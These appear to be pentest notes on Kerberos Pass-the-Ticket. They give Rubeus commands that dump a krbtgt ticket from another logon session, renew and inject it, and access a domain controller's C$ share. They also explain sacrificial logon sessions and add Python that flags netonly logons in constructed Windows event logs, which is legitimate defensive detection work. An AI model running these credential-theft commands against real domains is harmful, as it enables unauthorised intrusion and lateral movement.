Pass the Ticket
PTT: Check in-house tickets:
.\Rubeus.exe triage
Our current LUID (Logon UID) is 0x892730, but no tickets are associated with our session. We can use klist to confirm this.
Reviewing Tickets Associated with Our Session
klist
Extracting the ticket with Rubeus
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
Renew
Rubeus.exe renew /ticket: /ptt
dir \\dc01\c$
Sacrificial Processes
This is the most crucial concept to understand regarding Kerberos attacks, as failure to create a sacrificial process can result in taking a service down. This is because it is very easy to overwrite an existing logon session's Kerberos ticket. If the local machine account (SYSTEM$) loses its Kerberos ticket, it will likely not get another one until a reboot. If a service loses its ticket, it won't get a new one until the service restarts or, sometimes, until the machine reboots.
A sacrificial process creates a new logon session and passes tickets to that session. This requires administrative rights on the machine and creates additional IOCs (Indicators of Compromise) that could be alerted upon. However, causing an outage during an engagement is much worse than getting caught because you did things safely.
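
One way to alert on the extra logon session described above, as an added example that is not part of the original notes. It assumes logon auditing is enabled, Security events are exported as XML, and the session is created through a netonly-style secondary logon, which Windows records as event 4624 with LogonType 9 and logon process "seclogo". Host names, accounts and LUIDs in the sample are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def _evt(event_id, computer, **data):
    """Build one constructed Security-log event in exported XML form."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System>'
            f'<EventData>{fields}</EventData></Event>')

# Constructed sample data (not taken from a real system).
SAMPLE_EVENTS = [
    _evt(4624, "ws01.example.local", LogonType=2, LogonProcessName="User32 ",
         SubjectUserName="WS01$", TargetUserName="alice",
         TargetLogonId="0x7a1100", TargetOutboundUserName="-"),
    _evt(4624, "ws01.example.local", LogonType=9, LogonProcessName="seclogo",
         SubjectUserName="alice", TargetUserName="alice",
         TargetLogonId="0x7b2200", TargetOutboundUserName="svc_backup"),
    _evt(4634, "ws01.example.local", LogonType=2, TargetUserName="alice",
         TargetLogonId="0x7a1100"),
]

def parse_event(xml_text):
    """Return (event_id, computer, {field: value}) for one exported event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    computer = root.findtext("e:System/e:Computer", namespaces=NS)
    data = {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, computer, data

def find_netonly_logons(events, allowed_accounts=()):
    """Flag 4624 logons of type 9 created by the secondary logon service.

    allowed_accounts: lowercase caller names that legitimately use runas /netonly.
    """
    hits = []
    for xml_text in events:
        event_id, computer, d = parse_event(xml_text)
        if event_id != 4624 or d.get("LogonType") != "9":
            continue
        if d.get("LogonProcessName", "").lower() != "seclogo":
            continue
        if d.get("SubjectUserName", "").lower() in allowed_accounts:
            continue
        hits.append({"host": computer, "caller": d.get("SubjectUserName"),
                     "new_luid": d.get("TargetLogonId"),
                     "outbound_account": d.get("TargetOutboundUserName")})
    return hits
```

The new_luid value in each hit is the logon session to review for tickets that do not belong to the caller.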